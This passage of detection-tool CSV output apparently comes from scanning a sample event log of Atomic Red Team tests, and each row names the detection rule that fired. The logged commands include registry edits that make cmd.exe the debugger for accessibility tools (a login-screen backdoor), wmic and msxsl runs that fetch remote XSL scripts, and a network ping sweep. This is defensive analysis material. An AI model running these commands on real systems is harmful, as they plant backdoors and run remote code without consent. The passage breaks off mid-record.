HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\sethc.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:07.322 +09:00,MSEDGEWIN10,13,critical,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:07.322 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:07.357 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:10.266 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\utilman.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:10.282 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\utilman.exe /v Debugger /t REG_SZ /d 
C:\windows\system32\cmd.exe /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\utilman.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:10.295 +09:00,MSEDGEWIN10,13,critical,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:10.295 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:10.324 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:13.109 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\magnify.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:13.127 +09:00,MSEDGEWIN10,1,informational,Process 
Creation,"Command: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\magnify.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\magnify.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:13.153 +09:00,MSEDGEWIN10,13,critical,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:13.153 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:13.185 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:14.678 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\narrator.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:14.692 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\narrator.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\narrator.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:14.716 +09:00,MSEDGEWIN10,13,critical,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:14.716 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:14.827 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:17.941 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution 
""Options\DisplaySwitch.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:17.963 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\DisplaySwitch.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\DisplaySwitch.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:17.990 +09:00,MSEDGEWIN10,13,critical,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:17.990 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:18.009 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:19.467 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\atbroker.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:19.491 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\atbroker.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\atbroker.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:19.516 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:19.549 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:25.376 +09:00,MSEDGEWIN10,3,low,PowerShell Network 
Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:50.046 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Temp\msxsl.exe C:\AtomicRedTeam\atomics\T1220\src\msxslxmlfile.xml C:\AtomicRedTeam\atomics\T1220\src\msxslscript.xsl"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:50.086 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:53.011 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Temp\msxsl.exe https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslxmlfile.xml https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslscript.xsl"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:53.062 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:55.991 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""wmic.exe process /FORMAT:list"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:56.047 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: wmic.exe process /FORMAT:list : Path: C:\Windows\System32\wbem\WMIC.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""wmic.exe process /FORMAT:list""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:56.182 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:06.728 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:06.753 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: wmic.exe process 
/FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl : Path: C:\Windows\System32\wbem\WMIC.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:06.753 +09:00,MSEDGEWIN10,1,medium,XSL Script Processing,,rules/sigma/process_creation/win_xsl_script_processing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:06.753 +09:00,MSEDGEWIN10,1,medium,SquiblyTwo,,rules/sigma/process_creation/win_bypass_squiblytwo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:06.888 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:09.823 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""net view /domain"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:09.845 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: net view /domain : Path: C:\Windows\System32\net.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""net view 
/domain""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:09.845 +09:00,MSEDGEWIN10,1,low,Net.exe Execution,,rules/sigma/process_creation/win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:09.845 +09:00,MSEDGEWIN10,1,low,Windows Network Enumeration,,rules/sigma/process_creation/win_net_enum.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:22.314 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""net view"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:22.333 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: net view : Path: C:\Windows\System32\net.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""net view""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:22.333 +09:00,MSEDGEWIN10,1,low,Net.exe Execution,,rules/sigma/process_creation/win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:22.333 +09:00,MSEDGEWIN10,1,low,Windows Network Enumeration,,rules/sigma/process_creation/win_net_enum.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:34.797 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: 
C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:35.014 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %%i in (1,1,254) do ping -n 1 -w 100 192.168.1.%%i"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:35.038 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.1 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:35.579 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.2 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:35.988 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.3 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:36.549 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.4 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:37.034 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.5 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:37.513 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.6 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:38.020 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.7 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:38.517 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.8 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:39.028 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.9 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:39.537 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.10 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:40.027 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.11 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:40.431 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.12 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
